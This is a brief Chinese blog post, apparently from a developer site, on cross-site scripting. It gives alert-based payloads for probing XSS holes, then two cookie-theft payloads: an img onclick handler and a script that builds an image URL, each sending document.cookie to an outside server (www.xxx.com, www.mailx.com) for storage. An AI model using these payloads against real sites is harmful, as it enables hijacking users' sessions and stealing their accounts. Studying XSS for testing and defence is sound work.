web安全 之 xss攻击
来源:互联网 发布:数据库业务流程 编辑:程序博客网 时间:2024/04/26 01:09
1、嵌入js代码,测试是否有xss注入漏洞
1.1、get参数嵌入,页面返回有弹框alert,存在xss漏洞
index.php?abc=<script>alert(11);</script>
1.2、在输入框嵌入,提交后查看相应页面,页面返回有弹框alert,存在xss漏洞
<script>alert(11);</script>
1.3、页面alert cookie
<script>alert(document.cookie);</script>
2、诱导用户点击类似
<img onclick="javascript:window.location.href='www.xxx.com/index.php?info='+document.cookie" />
远程服务器保存cookie
或者
var img = document.createElement("img");
img.src = 'http://www.mailx.com/tvswc/admin.php?r=activity/test11&cookie='+escape(document.cookie);
document.body.appendChild(img);
0 0
- web安全之xss 攻击
- web安全 之 xss攻击
- web安全防范之XSS漏洞攻击
- Web前端安全之XSS攻击
- web前端安全之XSS攻击
- WEB安全测试之XSS攻击
- WEB安全之XSS和CRSF攻击
- web安全 xss攻击
- 浅谈Web安全-XSS攻击
- [Web安全之实战] 跨站脚本攻击XSS
- Web安全之XSS跨站脚本攻击
- web安全之Xss攻击和Sql注入
- Web安全之XSS跨站脚本攻击
- 安全测试之XSS攻击
- 前端安全之XSS攻击
- 前端安全之XSS攻击
- 前端安全之XSS攻击
- 前端安全之XSS攻击
- Gradle DSL method not found: 'runProguard()'
- Text与Int WritableComparable 重写的比较
- Windows命令行解压缩
- 1051. Pop Sequence
- IOS在app之间共享文件
- web安全 之 xss攻击
- android音乐播放器显示歌词
- Struts学习(—)
- SMP Primer for Android
- 欢迎使用CSDN-markdown编辑器
- 在机器学习模型运行时保持高效的方法
- 单源最短路径算法小结
- windows2003搭建SVN服务器
- UIKit框架-高级控件:10.UITableView的简单简介
